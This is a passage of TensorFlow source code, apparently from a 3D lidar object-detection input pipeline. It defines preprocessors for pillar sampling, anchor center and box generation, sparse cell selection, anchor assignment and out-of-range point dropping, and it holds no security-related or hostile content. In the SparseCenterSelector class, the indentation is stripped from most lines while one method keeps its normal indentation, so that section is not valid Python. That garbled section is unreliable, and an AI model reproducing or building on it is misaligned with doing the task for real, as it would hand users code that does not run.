      log probabilities. Taking the top k elements from this provides a
      multinomial sample without replacement.
    """
    p = self.params
    log_prob = tf.math.log(probs)
    probs_shape = tf.shape(probs)
    uniform_samples = tf.random.uniform(
        shape=probs_shape,
        dtype=probs.dtype,
        seed=p.random_seed,
        name='uniform_samples')
    # Standard Gumbel(0, 1) noise: -log(-log(U)), U ~ Uniform(0, 1).
    gumbel_noise = -tf.math.log(-tf.math.log(uniform_samples))
    return gumbel_noise + log_prob

  def _DensitySample(self, num_points):
    """Samples pillar locations with probability proportional to point count.

    Args:
      num_points: [gx, gy, gz] integer tensor of per-cell point counts.

    Returns:
      A [K, 3] integer tensor of sampled grid locations, where
      K = min(p.num_pillars, total number of grid cells).
    """
    p = self.params

    # Flatten to [nx * ny * nz] for convenience during sampling.
    num_grid_points = np.prod(p.grid_size)
    flattened_num_points = tf.reshape(num_points, [num_grid_points])

    # Normalize flattened_num_points to sum to 1.
    flattened_num_points = tf.cast(flattened_num_points, tf.float32)
    flattened_num_points /= tf.reduce_sum(flattened_num_points)

    # TODO(jngiam): Consider generalizing this to enable other methods of
    # sampling: e.g., use largest deviation in z-axis. The gumbel transform
    # can still be applied regardless.

    # Add gumbel noise for multinomial sampling.
    sampling_logits = self._GumbelTransform(flattened_num_points)
    _, locations = tf.nn.top_k(
        sampling_logits, k=min(p.num_pillars, num_grid_points))

    # Unravel coordinates back to grid locations.
    locations = tf.unravel_index(locations, p.grid_size)

    # Unravel index will return a 3 x num_locations tensor, this needs to be
    # transposed so that we have it as num_locations x 3.
    locations = py_utils.HasShape(locations, [3, -1])
    locations = tf.transpose(locations)

    return locations

  def TransformFeatures(self, features):
    p = self.params

    num_points = features.grid_num_points
    if p.use_density_sampler:
      locations = self._DensitySample(num_points)
    else:
      # Select non-empty cells uniformly at random.
      # NOTE(review): unlike _DensitySample, this shuffle does not pass
      # p.random_seed — confirm the nondeterminism here is intended.
      locations = tf.random.shuffle(tf.cast(tf.where(num_points > 0), tf.int32))

    num_features = py_utils.GetShape(features.laser_grid)[-1]

    # [nx, ny, nz, np, 4] (x, y, z, f)
    points = features.laser_grid

    # [K, np, 4] (x, y, z, f)
    points = tf.gather_nd(points, locations)

    # [nx, ny, nz, 1, 3] (cx, cy, cz)
    centers = features.grid_centers[..., tf.newaxis, :]

    # [K, 1, 3] (cx, cy, cz)
    centers = tf.gather_nd(centers, locations)

    # NOTE: If there are fewer pillars than p.num_pillars, the following
    # padding creates many 'fake' pillars at grid cell (0, 0, 0) with
    # an all-zero pillar. Hopefully, the model can learn to ignore these.
    #
    # pillar_points[i, :, :] is the pillar located at pillar_locations[i, :3],
    # and pillar_points[i, :, :] == points_grid_full[pillar_locations[i, :3]].
    # for 0 <= i < pillar_count;
    # pillar_locations[i, :3] are zero-ed, for i >= pillar_count.
    features.pillar_count = tf.shape(locations)[0]
    features.pillar_locations = py_utils.PadOrTrimTo(locations,
                                                     [p.num_pillars, 3])
    features.pillar_points = py_utils.PadOrTrimTo(
        points, [p.num_pillars, p.num_points_per_cell, num_features])
    features.pillar_centers = py_utils.PadOrTrimTo(centers,
                                                   [p.num_pillars, 1, 3])

    if p.drop_laser_grid:
      del features['laser_grid']

    return features

  def TransformShapes(self, shapes):
    p = self.params
    num_features = shapes.laser_grid[-1]
    shapes.pillar_count = tf.TensorShape([])
    shapes.pillar_locations = tf.TensorShape([p.num_pillars, 3])
    shapes.pillar_points = tf.TensorShape(
        [p.num_pillars, p.num_points_per_cell, num_features])
    shapes.pillar_centers = tf.TensorShape([p.num_pillars, 1, 3])
    if p.drop_laser_grid:
      del shapes['laser_grid']
    return shapes

  def TransformDTypes(self, dtypes):
    p = self.params
    dtypes.pillar_count = tf.int32
    dtypes.pillar_locations = tf.int32
    dtypes.pillar_points = tf.float32
    dtypes.pillar_centers = tf.float32
    if p.drop_laser_grid:
      del dtypes['laser_grid']
    return dtypes
class GridAnchorCenters(Preprocessor):
  """Create anchor centers on a grid.

  Anchors are placed in the middle of each grid cell. For example, on a 2D grid
  range (0 -> 10, 0 -> 10) with a 10 x 5 grid size, the anchors will be placed
  at [(0.5, 1), (0.5, 3), ... , (9.5, 7), (9.5, 9)].

  Adds the following features:
    anchor_centers: [gx, gy, gz, 3] - Floating point tensor containing the
      center (x, y, z) locations for tiling anchor boxes, reshaped to the
      grid dimensions given by p.grid_size.
  """

  @classmethod
  def Params(cls):
    p = super().Params()
    p.Define(
        'grid_size', (20, 20, 1), 'Grid size along x,y,z axis. This will '
        'be used to generate the anchor center locations. Note that this '
        'would likely be different from the grid_* parameters in '
        'LaserGridExtractor: the grid extractor may choose to extract '
        'points more densely. Instead, this should correspond to the '
        'model\'s prediction layer: the predicted anchor box residuals '
        'should match this grid.')
    p.Define('grid_range_x', (-25, 25), 'The x-axis range covered by the grid.')
    p.Define('grid_range_y', (-25, 25), 'The y-axis range covered by the grid.')
    p.Define('grid_range_z', (0, 0), 'The z-axis range covered by the grid.')
    return p

  def TransformFeatures(self, features):
    p = self.params
    utils_3d = detection_3d_lib.Utils3D()

    # Compute the grid cell size and adjust the range sent to dense coordinates
    # by half a cell size so as to ensure that the anchors are placed in the
    # center of each grid cell.
    grid_size_x, grid_size_y, grid_size_z = p.grid_size
    grid_cell_sizes = [
        float(p.grid_range_x[1] - p.grid_range_x[0]) / grid_size_x,
        float(p.grid_range_y[1] - p.grid_range_y[0]) / grid_size_y,
        float(p.grid_range_z[1] - p.grid_range_z[0]) / grid_size_z,
    ]
    half_size_x, half_size_y, half_size_z = np.asarray(grid_cell_sizes) / 2.0

    # Each [start + half, end - half, count] triple enumerates the cell-center
    # coordinates along one axis.
    grid_shape = list(p.grid_size) + [3]
    anchor_centers = utils_3d.CreateDenseCoordinates([
        [
            p.grid_range_x[0] + half_size_x,
            p.grid_range_x[1] - half_size_x,
            grid_size_x
        ],
        [
            p.grid_range_y[0] + half_size_y,
            p.grid_range_y[1] - half_size_y,
            grid_size_y
        ],
        [
            p.grid_range_z[0] + half_size_z,
            p.grid_range_z[1] - half_size_z,
            grid_size_z
        ],
    ])  # pyformat: disable
    features.anchor_centers = tf.reshape(anchor_centers, grid_shape)

    return features

  def TransformShapes(self, shapes):
    p = self.params
    shapes.anchor_centers = tf.TensorShape(list(p.grid_size) + [3])
    return shapes

  def TransformDTypes(self, dtypes):
    dtypes.anchor_centers = tf.float32
    return dtypes
class SparseCenterSelector(Preprocessor):
"""Select centers for anchors and cells.
This preprocessor expects features to contain the following keys:
- lasers.points_xyz of shape [P, 3]
and optionally points_padding of shape [P] corresponding to the padding.
if points_padding is None, then all points are considered valid.
If lasers.num_seeded_points of shape [] is provided, it indicates that the
first num_seeded_points of lasers.points_xyz should be used as seeds for
farthest point sampling (e.g., always chosen). Currently the concept
of seeding is not implemented for anything but farthest point sampling.
Adds the following features:
anchor_centers: [num_cell_centers, 3] - Floating point output containing the
center (x, y, z) locations for tiling anchor boxes.
cell_center_xyz: [num_cell_centers, 3] - Floating point output containing
the center (x, y, z) locations for each cell to featurize.
"""
_SAMPLING_METHODS = ['farthest_point', 'random_uniform']
@classmethod
def Params(cls):
p = super().Params()
p.Define('num_cell_centers', 256, 'Number of centers.')
p.Define(
'features_preparation_layers', [],
'A list of Params for layers to run on the features before '
'performing farthest point sampling. For example, one may wish to '
'drop points out of frustum for KITTI before selecting centers. '
'Note that these layers will not mutate the original features, '
'instead, a copy will be made.')
p.Define(
'sampling_method', 'farthest_point',
'Which sampling method to use. One of {}'.format(cls._SAMPLING_METHODS))
p.Define(
'fix_z_to_zero', True, 'Whether to fix z to 0 when retrieving the '
'center xyz coordinates.')
return p
def __init__(self, params):
super().__init__(params)
p = self.params
if p.sampling_method not in self._SAMPLING_METHODS:
raise ValueError('Param `sampling_method` must be one of {}.'.format(
self._SAMPLING_METHODS))
if p.features_preparation_layers is not None:
self.CreateChildren('features_preparation_layers',
p.features_preparation_layers)
def _FarthestPointSampleCenters(self, points_xyz, num_seeded_points):
"""Samples centers with Farthest Point Sampling.
Args:
points_xyz: An unpadded tf.float32 Tensor of shape [P, 3] with per point
(x, y, z) locations. We expect any padded points to be removed before
this function is called.
num_seeded_points: integer indicating how many of the first
num_seeded_points points in points_xyz should be considered
as seeds for FPS (always chosen).
Returns:
A tf.float32 Tensor of shape [p.num_cell_centers, 3] with selected centers
to use as anchors.
"""
p = self.params
num_points = tf.shape(points_xyz)[0]
points_padding = tf.zeros((num_points,), dtype=tf.float32)
padded_num_points = tf.maximum(num_points, p.num_cell_centers)
# Pad both the points and padding if for some reason the input pointcloud
# has less points than p.num_cell_centers.
points_xy = py_utils.PadOrTrimTo(points_xyz[:, :2], [padded_num_points, 2])
points_padding = py_utils.PadOrTrimTo(
points_padding, [padded_num_points], pad_val=1.0)
sampled_idx, _ = car_lib.FarthestPointSampler(
points_xy[tf.newaxis, ...],
points_padding[tf.newaxis, ...],
p.num_cell_centers,
num_seeded_points=num_seeded_points,
random_seed=p.random_seed)
sampled_idx = sampled_idx[0, :]
# Gather centers.
if p.fix_z_to_zero:
centers = tf.concat([
tf.gather(points_xy, sampled_idx),
tf.zeros((p.num_cell_centers, 1)),
], axis=-1) # pyformat: disable
else:
centers = tf.gather(points_xyz, sampled_idx)
return centers
def _RandomUniformSampleCenters(self, points_xyz):
"""Samples centers with Random Uniform Sampling.
Args:
points_xyz: An unpadded tf.float32 Tensor of shape [P, 3] with per point
(x, y, z) locations. We expect any padded points to be removed before
this function is called.
Returns:
A tf.float32 Tensor of shape [p.num_cell_centers, 3] with selected centers
to use as anchors.
"""
p = self.params
# We want the center Z value to be 0 so just exclude it
centers_xy = tf.random.shuffle(points_xyz[:, :2], seed=p.random_seed)
selected_centers_xy = py_utils.PadOrTrimTo(centers_xy,
[p.num_cell_centers, 2])
return tf.concat([selected_centers_xy,
tf.zeros((p.num_cell_centers, 1))],
axis=-1)
def _SampleCenters(self, points_xyz, num_seeded_points):
p = self.params
if p.sampling_method == 'farthest_point':
return self._FarthestPointSampleCenters(points_xyz, num_seeded_points)
elif p.sampling_method == 'random_uniform':
if num_seeded_points > 0:
raise NotImplementedError(
'Random sampling with seeded points not yet implemented.')
return self._RandomUniformSampleCenters(points_xyz)
else:
raise ValueError('Param `sampling_method` must be one of {}.'.format(
self._SAMPLING_METHODS))
  def TransformFeatures(self, features):
    """Selects anchor centers and attaches them to `features`.

    Preparation layers run on a deep copy so they only influence which centers
    are selected; the original features are returned unmodified except for the
    added center tensors.
    """
    p = self.params
    prepared_features = features.DeepCopy()
    for prep_layer in self.features_preparation_layers:
      prepared_features = prep_layer.FPropDefaultTheta(prepared_features)

    num_seeded_points = prepared_features.lasers.get('num_seeded_points', 0)
    points_data = prepared_features.lasers

    points_xyz = points_data.points_xyz
    if 'points_padding' in points_data:
      points_padding = points_data.points_padding
      points_mask = 1 - points_padding
      # The samplers require an unpadded point cloud.
      points_xyz = tf.boolean_mask(points_xyz, points_mask)

    centers = self._SampleCenters(points_xyz, num_seeded_points)
    centers = py_utils.HasShape(centers, [p.num_cell_centers, 3])

    # Both keys reference the same selected centers.
    features.anchor_centers = centers
    features.cell_center_xyz = centers

    return features
def TransformShapes(self, shapes):
p = self.params
shapes.anchor_centers = tf.TensorShape([p.num_cell_centers, 3])
shapes.cell_center_xyz = tf.TensorShape([p.num_cell_centers, 3])
return shapes
def TransformDTypes(self, dtypes):
dtypes.anchor_centers = tf.float32
dtypes.cell_center_xyz = tf.float32
return dtypes
class SparseCellGatherFeatures(Preprocessor):
  """Select local features for each cell.

  This preprocessor expects features to contain:
  - lasers.points_xyz of shape [P, 3]
  - lasers.points_feature of shape [P, F]
  - cell_center_xyz of shape [C, 3]

  and optionally points_padding of shape [P] corresponding to the padding.
  if points_padding is None, then all points are considered valid.

  Adds the following features:
    cell_points_xyz: [num_centers, num_points_per_cell, 3] - Floating point
      output containing the (x, y, z) locations for each point for a given
      center.
    cell_feature: [num_centers, num_points_per_cell, F] - Floating point output
      containing the features for each point for a given center.
    cell_points_padding: [num_centers, num_points_per_cell] - 0/1 padding
      for the points in each cell.
  """

  @classmethod
  def Params(cls):
    p = super().Params()
    p.Define('num_points_per_cell', 128, 'The number of points per cell.')
    p.Define('max_distance', 3.0, 'Max distance of point to cell center.')
    p.Define(
        'sample_neighbors_uniformly', False,
        'Whether to sample the neighbor points for every cell center '
        'uniformly at random. If False, this will default to selecting by '
        'distance.')
    return p

  def TransformFeatures(self, features):
    """Gathers up to `num_points_per_cell` neighbors for every cell center."""
    p = self.params

    num_centers = py_utils.GetShape(features.cell_center_xyz, 1)[0]
    num_features = py_utils.GetShape(features.lasers.points_feature)[-1]

    points_xyz = features.lasers.points_xyz
    points_feature = features.lasers.points_feature
    if 'points_padding' in features.lasers:
      points_mask = 1 - features.lasers.points_padding
      points_xyz = tf.boolean_mask(points_xyz, points_mask)
      points_feature = tf.boolean_mask(points_feature, points_mask)

    # Note: points_xyz and points_feature must be unpadded as we pass
    # padding=None to neighborhood indices. Ensuring that it is unpadded
    # helps improve performance.

    # Get nearby points using kNN.
    sample_indices, sample_indices_padding = car_lib.NeighborhoodIndices(
        tf.expand_dims(points_xyz, 0),
        tf.expand_dims(features.cell_center_xyz, 0),
        p.num_points_per_cell,
        points_padding=None,
        max_distance=p.max_distance,
        sample_neighbors_uniformly=p.sample_neighbors_uniformly)

    # Take first example since NeighboorhoodIndices expects batch dimension.
    sample_indices = sample_indices[0, :, :]
    sample_indices_padding = sample_indices_padding[0, :, :]

    sample_indices = py_utils.HasShape(sample_indices,
                                       [num_centers, p.num_points_per_cell])

    # Gather the xyz and feature values for each selected neighbor index.
    cell_points_xyz = tf.gather(points_xyz, sample_indices)
    cell_points_xyz = py_utils.HasShape(cell_points_xyz,
                                        [num_centers, p.num_points_per_cell, 3])

    cell_feature = tf.gather(points_feature, sample_indices)
    cell_feature = py_utils.HasShape(
        cell_feature, [num_centers, p.num_points_per_cell, num_features])

    cell_points_padding = py_utils.HasShape(
        sample_indices_padding, [num_centers, p.num_points_per_cell])

    features.update({
        'cell_points_xyz': cell_points_xyz,
        'cell_feature': cell_feature,
        'cell_points_padding': cell_points_padding,
    })
    return features

  def TransformShapes(self, shapes):
    """Adds static shapes for the per-cell tensors."""
    p = self.params
    num_centers = shapes.cell_center_xyz[0]
    base_shape = [num_centers, p.num_points_per_cell]
    num_features = shapes.lasers.points_feature[-1]
    shapes.cell_points_xyz = tf.TensorShape(base_shape + [3])
    shapes.cell_feature = tf.TensorShape(base_shape + [num_features])
    shapes.cell_points_padding = tf.TensorShape(base_shape)
    return shapes

  def TransformDTypes(self, dtypes):
    """Adds dtypes for the per-cell tensors."""
    dtypes.cell_points_xyz = tf.float32
    dtypes.cell_feature = tf.float32
    dtypes.cell_points_padding = tf.float32
    return dtypes
class SparseCellCentersTopK(Preprocessor):
  """Given selected centers and gathered points/features, apply a filter.

  This preprocessor expects features to contain `cell_center_xyz` and all
  entries in params.features_to_modify, and that the leading dimension should
  all be the same (num_cell_centers from SparseCenterSelector).

  We then modify all values in features that are specified in
  params.features_to_modify by sorting them with the specified sort function
  (specified by params.sort_by) operating on features.cell_center_xyz, and then
  taking the top K (specified by params.num_cell_centers) along the first
  dimension.
  """

  # Registry of valid values for the `sort_by` param.
  _REGISTERED_SORT_FUNCTIONS = ['distance']

  @classmethod
  def Params(cls):
    p = super().Params()
    p.Define('num_cell_centers', 512, 'The number of centers after filtering.')
    p.Define(
        'sort_by', 'distance', 'A string specifying which sort function '
        'to use. Currently we just support `distance`.')
    p.Define('features_to_modify', [
        'cell_center_xyz', 'anchor_centers', 'cell_points_xyz', 'cell_feature',
        'cell_points_padding'
    ], 'A list of keys from the features dict to modify.')
    return p

  def __init__(self, params):
    """Validates the sort function and the list of keys to modify."""
    super().__init__(params)
    p = self.params
    if p.sort_by not in self._REGISTERED_SORT_FUNCTIONS:
      raise ValueError('{} not supported. We only support {}.'.format(
          p.sort_by, self._REGISTERED_SORT_FUNCTIONS))
    if len(p.features_to_modify) < 1:
      raise ValueError('Need to modify at least one feature.')

  def _SortByDistance(self, features):
    """Returns indices sorting centers by ascending distance to the origin."""
    dist = tf.linalg.norm(features.cell_center_xyz, axis=-1)
    return tf.argsort(dist, axis=-1, direction='ASCENDING')

  def _Sort(self, features):
    """Dispatches to the sort routine named by `sort_by`."""
    p = self.params
    if p.sort_by == 'distance':
      return self._SortByDistance(features)
    else:
      raise ValueError('Unsupported sort function: {}.'.format(p.sort_by))

  def TransformFeatures(self, features):
    """Keeps the top `num_cell_centers` entries of each listed feature."""
    p = self.params
    sort_indices = self._Sort(features)
    sort_indices_top_k = sort_indices[:p.num_cell_centers, ...]

    # Gather each of the relevant items
    for key in p.features_to_modify:
      shape = py_utils.GetShape(features[key])
      output_shape = [p.num_cell_centers] + shape[1:]
      # Pad in case there were fewer centers than num_cell_centers.
      features[key] = py_utils.PadOrTrimTo(
          tf.gather(features[key], sort_indices_top_k), output_shape)
    return features

  def TransformShapes(self, shapes):
    """Updates leading dims of every modified feature to num_cell_centers."""
    p = self.params
    for key in p.features_to_modify:
      shapes[key] = tf.TensorShape([p.num_cell_centers] + shapes[key][1:])
    return shapes

  def TransformDTypes(self, dtypes):
    """No dtype changes; values are only reordered and trimmed."""
    return dtypes
class TileAnchorBBoxes(Preprocessor):
  """Creates anchor_bboxes given anchor_centers.

  This preprocessor expects features to contain the following keys:
  - anchor_centers of shape [...base shape..., 3]

  Adds the following features:
    anchor_bboxes: base_shape + [7] - Floating point anchor box
      output containing the anchor boxes and the 7 floating point
      values for each box that define the box (x, y, z, dx, dy, dz, phi).
  """

  @classmethod
  def Params(cls):
    p = super().Params()
    p.Define('anchor_box_dimensions', [],
             'List of anchor box sizes per center.')
    p.Define('anchor_box_offsets', [], 'List of anchor box offsets per center.')
    p.Define('anchor_box_rotations', [],
             'List of anchor box rotations per center.')
    return p

  def TransformFeatures(self, features):
    """Tiles the configured anchor boxes at every anchor center."""
    p = self.params
    utils_3d = detection_3d_lib.Utils3D()

    # Guard against an unconfigured preprocessor; the messages make the
    # failure self-explanatory instead of a bare AssertionError.
    assert p.anchor_box_dimensions, 'anchor_box_dimensions must be non-empty.'
    assert p.anchor_box_offsets, 'anchor_box_offsets must be non-empty.'
    assert p.anchor_box_rotations, 'anchor_box_rotations must be non-empty.'

    base_shape = py_utils.GetShape(features.anchor_centers)[:-1]
    num_box_per_center = len(p.anchor_box_dimensions)

    # Flatten any leading dims so MakeAnchorBoxes sees a [N, 3] center tensor,
    # then restore base_shape on the result.
    anchor_centers = tf.reshape(features.anchor_centers, [-1, 3])
    anchor_bboxes = utils_3d.MakeAnchorBoxes(
        anchor_centers, tf.identity(p.anchor_box_dimensions),
        tf.identity(p.anchor_box_offsets), tf.identity(p.anchor_box_rotations))
    features.anchor_bboxes = tf.reshape(anchor_bboxes,
                                        base_shape + [num_box_per_center, 7])
    return features

  def TransformShapes(self, shapes):
    """Adds the static shape of the tiled anchor boxes."""
    p = self.params
    base_shape = shapes.anchor_centers[:-1]
    num_box_per_center = len(p.anchor_box_dimensions)
    shapes.anchor_bboxes = base_shape.concatenate([num_box_per_center, 7])
    return shapes

  def TransformDTypes(self, dtypes):
    """Adds the dtype of the tiled anchor boxes."""
    dtypes.anchor_bboxes = tf.float32
    return dtypes
class _AnchorBoxSettings:
  """Helper class to parameterize and update anchor box settings."""
  # Implementations should fill out the following class members.
  DIMENSION_PRIORS = []
  ROTATIONS = []
  CENTER_X_OFFSETS = []
  CENTER_Y_OFFSETS = []
  CENTER_Z_OFFSETS = []

  @classmethod
  def NumAnchors(cls):
    """Returns the total number of anchor combinations (cartesian product)."""
    return np.prod([
        len(cls.DIMENSION_PRIORS),
        len(cls.ROTATIONS),
        len(cls.CENTER_X_OFFSETS),
        len(cls.CENTER_Y_OFFSETS),
        len(cls.CENTER_Z_OFFSETS)
    ])

  @classmethod
  def GenerateAnchorSettings(cls):
    """Generate anchor settings.

    Returns:
      A `NestedMap` containing three lists of the same length:
        - anchor_box_dimensions
        - anchor_box_rotations
        - anchor_box_offsets

      These can be used with the TileAnchorBBoxes preprocessor.
    """
    anchor_box_dimensions = []
    anchor_box_rotations = []
    anchor_box_offsets = []

    # The following is equivalent to a formulation of itertools.product, but
    # is explicitly listed for readability.

    # *Please note*: The ordering is important for ModelV2, which makes
    # assumptions that the offset dimensions come first.
    for cx in cls.CENTER_X_OFFSETS:
      for cy in cls.CENTER_Y_OFFSETS:
        for cz in cls.CENTER_Z_OFFSETS:
          for rot in cls.ROTATIONS:
            for dims in cls.DIMENSION_PRIORS:
              anchor_box_dimensions += [dims]
              anchor_box_rotations += [rot]
              anchor_box_offsets += [(cx, cy, cz)]

    # Check one of the lists has entries.
    assert anchor_box_dimensions

    return py_utils.NestedMap(
        anchor_box_dimensions=anchor_box_dimensions,
        anchor_box_rotations=anchor_box_rotations,
        anchor_box_offsets=anchor_box_offsets)

  @classmethod
  def Update(cls, params):
    """Updates anchor box settings from input configuration lists.

    Given dimensions priors, rotations, and offsets, computes the cartesian
    product of the settings.

    Args:
      params: The KITTIAnchorExtractorBase.Params() object to update.

    Returns:
      Params updated with the anchor settings.

      In total there are N combinations, where each (anchor_box_dimensions[i],
      anchor_box_rotations[i], anchor_box_offsets[i]) for i in range(N) is an
      option.
    """
    p = params
    settings = cls.GenerateAnchorSettings()
    p.anchor_box_dimensions = settings.anchor_box_dimensions
    p.anchor_box_rotations = settings.anchor_box_rotations
    p.anchor_box_offsets = settings.anchor_box_offsets
    return p
def MakeAnchorBoxSettings(dimension_priors, rotations, center_x_offsets,
                          center_y_offsets, center_z_offsets):
  """Returns a configured class for setting anchor box settings."""
  # Build the subclass dynamically; equivalent to a local class statement
  # that assigns each configuration list to the matching class attribute.
  attrs = dict(
      DIMENSION_PRIORS=dimension_priors,
      ROTATIONS=rotations,
      CENTER_X_OFFSETS=center_x_offsets,
      CENTER_Y_OFFSETS=center_y_offsets,
      CENTER_Z_OFFSETS=center_z_offsets)
  return type('CustomAnchorBoxSettings', (_AnchorBoxSettings,), attrs)
class SparseCarV1AnchorBoxSettings(_AnchorBoxSettings):
  """Anchor box settings for training on Cars for Sparse models."""

  # Borrowed from PointPillar dimension prior for cars.
  DIMENSION_PRIORS = [(1.6, 3.9, 1.56)]

  # 4 Rotations with axis aligned and both diagonals.
  ROTATIONS = [0, np.pi / 2, np.pi / 4, 3 * np.pi / 4]

  # 25 offsets per anchor box with fixed z offset at -1.
  # (5 x-offsets times 5 y-offsets, evenly spaced in [-1.5, 1.5] meters.)
  CENTER_X_OFFSETS = np.linspace(-1.5, 1.5, 5)
  CENTER_Y_OFFSETS = np.linspace(-1.5, 1.5, 5)
  CENTER_Z_OFFSETS = [-1.]
class PointPillarAnchorBoxSettingsCar(_AnchorBoxSettings):
  """PointPillars-style anchor box settings for the car class."""
  DIMENSION_PRIORS = [(1.6, 3.9, 1.56)]
  ROTATIONS = [0, np.pi / 2]
  # Fixed offset for every anchor box, based on a reading of the paper / code
  # 0 offsets for x and y, and -1 for z.
  CENTER_X_OFFSETS = [0.]
  CENTER_Y_OFFSETS = [0.]
  CENTER_Z_OFFSETS = [-1.]
class PointPillarAnchorBoxSettingsPed(PointPillarAnchorBoxSettingsCar):
  """PointPillars-style anchor box settings for the pedestrian class."""
  # Smaller dimension prior and a higher z offset than the car settings.
  DIMENSION_PRIORS = [(0.6, 0.8, 1.73)]
  CENTER_Z_OFFSETS = [-0.6]
class PointPillarAnchorBoxSettingsCyc(PointPillarAnchorBoxSettingsCar):
  """PointPillars-style anchor box settings for the cyclist class."""
  DIMENSION_PRIORS = [(0.6, 1.76, 1.73)]
  CENTER_Z_OFFSETS = [-0.6]
class PointPillarAnchorBoxSettingsPedCyc(PointPillarAnchorBoxSettingsCar):
  """PointPillars-style joint pedestrian/cyclist anchor box settings."""
  # Two dimension priors: one per class.
  DIMENSION_PRIORS = [(0.6, 0.8, 1.7), (0.6, 1.76, 1.73)]
  CENTER_Z_OFFSETS = [-0.6]
class AnchorAssignment(Preprocessor):
  """Perform anchor assignment on the features.

  This preprocessor expects features to contain the following keys:
  - anchor_bboxes of shape [...base shape..., 7]
  - labels.bboxes_3d
  - labels.labels
  - labels.bboxes_3d_mask

  Adds the following features:

    anchor_localization_residuals: base_shape + [7] floating point tensor of
      residuals. The model is expected to regress against these residuals as
      targets. The residuals can be converted back into bboxes using
      detection_3d_lib.Utils3D.ResidualsToBBoxes.
    assigned_gt_idx: base_shape - The corresponding index of the ground
      truth bounding box for each anchor box in anchor_bboxes, anchors not
      assigned will have idx be set to -1.
    assigned_gt_bbox: base_shape + [7] - The corresponding ground
      truth bounding box for each anchor box in anchor_bboxes.
    assigned_gt_labels: base_shape - The assigned groundtruth label
      for each anchor box.
    assigned_gt_similarity_score: base_shape - The similarity score
      for each assigned anchor box.
    assigned_cls_mask: base_shape mask for classification loss per anchor.
      This should be 1.0 if the anchor has a foreground or background
      assignment; otherwise, it will be assigned to 0.0.
    assigned_reg_mask: base_shape mask for regression loss per anchor.
      This should be 1.0 if the anchor has a foreground assignment;
      otherwise, it will be assigned to 0.0.
      Note: background anchors do not have regression targets.
  """

  @classmethod
  def Params(cls):
    p = super().Params()
    p.Define(
        'foreground_assignment_threshold', 0.5,
        'Score (usually IOU) threshold for assigning a box as foreground.')
    p.Define(
        'background_assignment_threshold', 0.35,
        'Score (usually IOU) threshold for assigning a box as background.')
    return p

  def TransformFeatures(self, features):
    """Assigns each anchor a groundtruth box, label, and regression target."""
    p = self.params

    utils_3d = detection_3d_lib.Utils3D()

    # anchor_bboxes will be returned with shape [#centers, #boxes_per_center, 7]
    # flatten boxes here for matching.
    base_shape = py_utils.GetShape(features.anchor_bboxes)[:-1]
    anchor_bboxes = tf.reshape(features.anchor_bboxes, [-1, 7])

    assigned_anchors = utils_3d.AssignAnchors(
        anchor_bboxes,
        features.labels.bboxes_3d,
        features.labels.labels,
        features.labels.bboxes_3d_mask,
        foreground_assignment_threshold=p.foreground_assignment_threshold,
        background_assignment_threshold=p.background_assignment_threshold)

    # Add new features; reshape each flat assignment back to base_shape.
    features.assigned_gt_idx = tf.reshape(assigned_anchors.assigned_gt_idx,
                                          base_shape)
    features.assigned_gt_bbox = tf.reshape(assigned_anchors.assigned_gt_bbox,
                                           base_shape + [7])
    features.assigned_gt_labels = tf.reshape(
        assigned_anchors.assigned_gt_labels, base_shape)
    features.assigned_gt_similarity_score = tf.reshape(
        assigned_anchors.assigned_gt_similarity_score, base_shape)
    features.assigned_cls_mask = tf.reshape(assigned_anchors.assigned_cls_mask,
                                            base_shape)
    features.assigned_reg_mask = tf.reshape(assigned_anchors.assigned_reg_mask,
                                            base_shape)

    # Compute residuals.
    features.anchor_localization_residuals = utils_3d.LocalizationResiduals(
        features.anchor_bboxes, features.assigned_gt_bbox)

    return features

  def TransformShapes(self, shapes):
    """Adds static shapes for all assignment outputs."""
    base_shape = shapes.anchor_bboxes[:-1]
    box_shape = base_shape.concatenate([7])

    shapes.anchor_localization_residuals = box_shape
    shapes.assigned_gt_idx = base_shape
    shapes.assigned_gt_bbox = box_shape
    shapes.assigned_gt_labels = base_shape
    shapes.assigned_gt_similarity_score = base_shape
    shapes.assigned_cls_mask = base_shape
    shapes.assigned_reg_mask = base_shape
    return shapes

  def TransformDTypes(self, dtypes):
    """Adds dtypes for all assignment outputs."""
    dtypes.anchor_localization_residuals = tf.float32
    dtypes.assigned_gt_idx = tf.int32
    dtypes.assigned_gt_bbox = tf.float32
    dtypes.assigned_gt_labels = tf.int32
    dtypes.assigned_gt_similarity_score = tf.float32
    dtypes.assigned_cls_mask = tf.float32
    dtypes.assigned_reg_mask = tf.float32
    return dtypes
class DropLaserPointsOutOfRange(Preprocessor):
  """Drops laser points that are out of pre-defined x/y/z ranges.

  This preprocessor expects features to contain the following keys:
  - lasers.points_xyz of shape [P, 3]
  - lasers.points_feature of shape [P, F]

  and optionally points_padding of shape [P] corresponding to the padding.
  if points_padding is None, then all points are considered valid.

  Modifies the following features:
    Removes or sets padding to 1 for all points outside a given range. Modifies
    all items in the lasers subdictionary like lasers.points_xyz,
    lasers.points_feature, lasers.points_padding, and optionally
    lasers.points_label, lasers.points_bbox_id.
  """

  @classmethod
  def Params(cls):
    p = super().Params()
    p.Define('keep_x_range', (-np.inf, np.inf),
             'Only points that have x coordinates within this range are kept.')
    p.Define('keep_y_range', (-np.inf, np.inf),
             'Only points that have y coordinates within this range are kept.')
    p.Define(
        'keep_z_range', (-np.inf, np.inf),
        'Only points that have z coordinates within this range are kept. '
        'Approximate ground-removal can be performed by specifying a '
        'lower-bound on the z-range.')
    return p

  def TransformFeatures(self, features):
    """Masks or removes points outside the configured keep ranges."""
    p = self.params
    points_xyz = features.lasers.points_xyz
    if 'points_padding' in features.lasers:
      points_mask = tf.cast(1 - features.lasers.points_padding, tf.bool)
    else:
      # All points are real, we keep points unpadded by applying boolean_mask
      # on points_mask later.
      points_mask = tf.ones_like(points_xyz[:, 0], dtype=tf.bool)

    min_x, max_x = p.keep_x_range
    min_y, max_y = p.keep_y_range
    min_z, max_z = p.keep_z_range

    # Short-circuit if all ranges are set to -inf, inf.
    if (np.all(np.isneginf([min_x, min_y, min_z])) and
        np.all(np.isposinf([max_x, max_y, max_z]))):
      return features

    # Only add comparison ops for finite bounds, to keep the graph minimal.
    if min_x != -np.inf:
      points_mask &= points_xyz[:, 0] >= min_x
    if min_y != -np.inf:
      points_mask &= points_xyz[:, 1] >= min_y
    if min_z != -np.inf:
      points_mask &= points_xyz[:, 2] >= min_z

    if max_x != np.inf:
      points_mask &= points_xyz[:, 0] <= max_x
    if max_y != np.inf:
      points_mask &= points_xyz[:, 1] <= max_y
    if max_z != np.inf:
      points_mask &= points_xyz[:, 2] <= max_z

